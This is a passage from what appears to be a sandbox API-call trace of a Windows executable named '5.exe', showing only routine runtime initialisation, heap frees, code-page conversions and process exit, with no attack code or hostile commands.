returned 1 [0180.353] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2988 | out: hHeap=0x890000) returned 1 [0180.353] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c29b0 | out: hHeap=0x890000) returned 1 [0180.353] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c29d8 | out: hHeap=0x890000) returned 1 [0180.353] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2a00 | out: hHeap=0x890000) returned 1 [0180.353] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2a28 | out: hHeap=0x890000) returned 1 [0180.353] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2a50 | out: hHeap=0x890000) returned 1 [0180.353] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2a78 | out: hHeap=0x890000) returned 1 [0180.353] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2aa0 | out: hHeap=0x890000) returned 1 [0180.353] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c4e00 | out: hHeap=0x890000) returned 1 [0180.353] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8beaf8 | out: hHeap=0x890000) returned 1 [0180.353] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0180.353] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0180.354] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8ba3e8 | out: hHeap=0x890000) returned 1 [0180.354] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bcdc8 | out: hHeap=0x890000) returned 1 [0180.354] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x0 [0180.354] GetLastError () returned 0x57 [0180.354] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f584 | out: phModule=0x18f584) returned 0 [0180.354] ExitProcess (uExitCode=0x0) [0180.354] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bad00 | out: hHeap=0x890000) returned 1 [0180.355] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Process: id = "9" image_name = "5.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\5.exe" page_root = "0x3e629000" os_pid = "0xb18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xabc" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\5.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 83 os_tid = 0xb28 [0180.399] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x9f015e80, dwHighDateTime=0x1d60e72)) [0180.399] GetCurrentProcessId () returned 0xb18 [0180.399] GetCurrentThreadId () returned 0xb28 [0180.399] GetTickCount () returned 0x1156b9f [0180.399] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=30041042525) returned 1 [0180.400] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x4045f4)) [0180.400] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0180.400] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1e40000 [0180.401] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0180.402] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0180.402] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0180.402] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0180.402] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0180.403] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x214) returned 0x1e407d0 [0180.403] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0180.404] GetCurrentThreadId () returned 0xb28 [0180.404] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x404025, hStdOutput=0x40435e, hStdError=0x1e407d0)) [0180.404] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x8, Size=0x800) returned 0x1e409f0 [0180.404] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0180.404] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0180.404] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0180.404] SetHandleCount (uNumber=0x20) returned 0x20 [0180.404] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\5.exe\" " [0180.404] GetEnvironmentStringsW () returned 0x311e98* [0180.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0180.404] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x0, Size=0x565) returned 0x1e411f8 [0180.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1e411f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0180.404] FreeEnvironmentStringsW (penv=0x311e98) returned 1 [0180.404] GetLastError () returned 0x5 [0180.404] SetLastError (dwErrCode=0x5) [0180.404] GetLastError () returned 0x5 [0180.404] SetLastError (dwErrCode=0x5) [0180.404] GetLastError () returned 0x5 [0180.405] SetLastError (dwErrCode=0x5) [0180.405] GetACP () returned 0x4e4 [0180.405] RtlAllocateHeap (HeapHandle=0x1e40000, Flags=0x0, Size=0x220) returned 0x1e41768 [0180.405] GetLastError () returned 0x5 [0180.405] SetLastError (dwErrCode=0x5) [0180.405] IsValidCodePage (CodePage=0x4e4) returned 1 [0180.405] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0180.405] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0180.405] GetLastError () returned 0x5 [0180.405] SetLastError (dwErrCode=0x5) [0180.405] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0180.405] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0180.405] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0180.405] GetLastError () returned 0x5 [0180.405] SetLastError (dwErrCode=0x5) [0180.405] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0180.405] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ봇慺蕕@Ā") returned 256 [0180.405] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ봇慺蕕@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0180.405] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ봇慺蕕@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0180.405] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿn+Oa\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0180.406] GetLastError () returned 0x5 [0180.406] SetLastError (dwErrCode=0x5) [0180.406] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0180.406] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ봇慺蕕@Ā") returned 256 [0180.406] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ봇慺蕕@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0180.406] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ봇慺蕕@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0180.406] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿn+Oa\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0180.406] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x466a18, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\5.exe")) returned 0x56 [0180.406] GetLastError () returned 0x0 [0180.406] SetLastError (dwErrCode=0x0) [0180.406] GetLastError () returned 0x0 [0180.406] SetLastError (dwErrCode=0x0) [0180.406] GetLastError () returned 0x0 [0180.406] SetLastError (dwErrCode=0x0) [0180.406] GetLastError () returned 0x0 [0180.406] SetLastError (dwErrCode=0x0) [0180.406] GetLastError () returned 0x0 [0180.406] SetLastError (dwErrCode=0x0) [0180.406] GetLastError () returned 0x0 [0180.407] SetLastError (dwErrCode=0x0) [0180.407] GetLastError () returned 0x0 [0180.407] SetLastError (dwErrCode=0x0) [0180.407] GetLastError () returned 0x0 [0180.407] SetLastError (dwErrCode=0x0) [0180.407] GetLastError () returned 0x0 [0180.407] SetLastError (dwErrCode=0x0) [0180.407] GetLastError () returned 0x0 [0180.407] SetLastError (dwErrCode=0x0) [0180.407] GetLastError () returned 0x0 [0180.407] SetLastError (dwErrCode=0x0) [0180.407] GetLastError () returned 0x0 [0180.407] SetLastError (dwErrCode=0x0) [0180.407] GetLastError () returned 0x0 [0180.407] SetLastError (dwErrCode=0x0) [0180.407] GetLastError () returned 0x0 [0180.407] SetLastError (dwErrCode=0x0) [0180.407] GetLastError () returned 0x0 [0180.407] SetLastError (dwErrCode=0x0) [0180.407] GetLastError () returned 0x0 [0180.407] SetLastError (dwErrCode=0x0) [0180.408] GetLastError () returned 0x0 [0180.408] SetLastError (dwErrCode=0x0) [0180.408] GetLastError () returned 0x0 [0180.408] SetLastError (dwErrCode=0x0) [0180.408] GetLastError () returned 0x0 [0180.408] SetLastError (dwErrCode=0x0) [0180.408] GetLastError () returned 0x0 [0180.408] SetLastError (dwErrCode=0x0) [0180.408] GetLastError () returned 0x0 [0180.408] SetLastError (dwErrCode=0x0) [0180.408] GetLastError () returned 0x0 [0180.408] SetLastError (dwErrCode=0x0) [0180.408] GetLastError () returned 0x0 [0180.408] SetLastError (dwErrCode=0x0) [0180.408] GetLastError () returned 0x0 [0180.408] SetLastError (dwErrCode=0x0) [0180.408] GetLastError () returned 0x0 [0180.408] SetLastError (dwErrCode=0x0) [0180.408] GetLastError () returned 0x0 [0180.409] SetLastError (dwErrCode=0x0) [0180.409] GetLastError () returned 0x0 [0180.409] SetLastError (dwErrCode=0x0) [0180.409] GetLastError () returned 0x0 [0180.415] SetLastError (dwErrCode=0x0) [0180.415] GetLastError () returned 0x0 [0180.415] SetLastError (dwErrCode=0x0) [0180.415] GetLastError () returned 0x0 [0180.415] SetLastError (dwErrCode=0x0) [0180.415] GetLastError () returned 0x0 [0180.415] SetLastError (dwErrCode=0x0) [0180.415] GetLastError () returned 0x0 [0180.415] SetLastError (dwErrCode=0x0) [0180.415] GetLastError () returned 0x0 [0180.415] SetLastError (dwErrCode=0x0) [0180.415] GetLastError () returned 0x0 [0180.416] SetLastError (dwErrCode=0x0) [0180.416] GetLastError () returned 0x0 [0180.416] SetLastError (dwErrCode=0x0) [0180.416] GetLastError () returned 0x0 [0180.416] SetLastError (dwErrCode=0x0) [0180.416] GetLastError () returned 0x0 [0180.416] SetLastError (dwErrCode=0x0) [0180.416] GetLastError () returned 0x0 [0180.416] SetLastError (dwErrCode=0x0) [0180.416] GetLastError () returned 0x0 [0180.416] SetLastError (dwErrCode=0x0) [0180.416] GetLastError () returned 0x0 [0180.416] SetLastError (dwErrCode=0x0) [0180.416] GetLastError () returned 0x0 [0180.416] SetLastError (dwErrCode=0x0) [0180.416] GetLastError () returned 0x0 [0180.416] SetLastError (dwErrCode=0x0) [0180.416] GetLastError () returned 0x0 [0180.416] SetLastError (dwErrCode=0x0) [0180.416] GetLastError () returned 0x0 [0180.416] SetLastError (dwErrCode=0x0) [0180.416] GetLastError () returned 0x0 [0180.417] SetLastError (dwErrCode=0x0) [0180.417] GetLastError () returned 0x0 [0180.417] 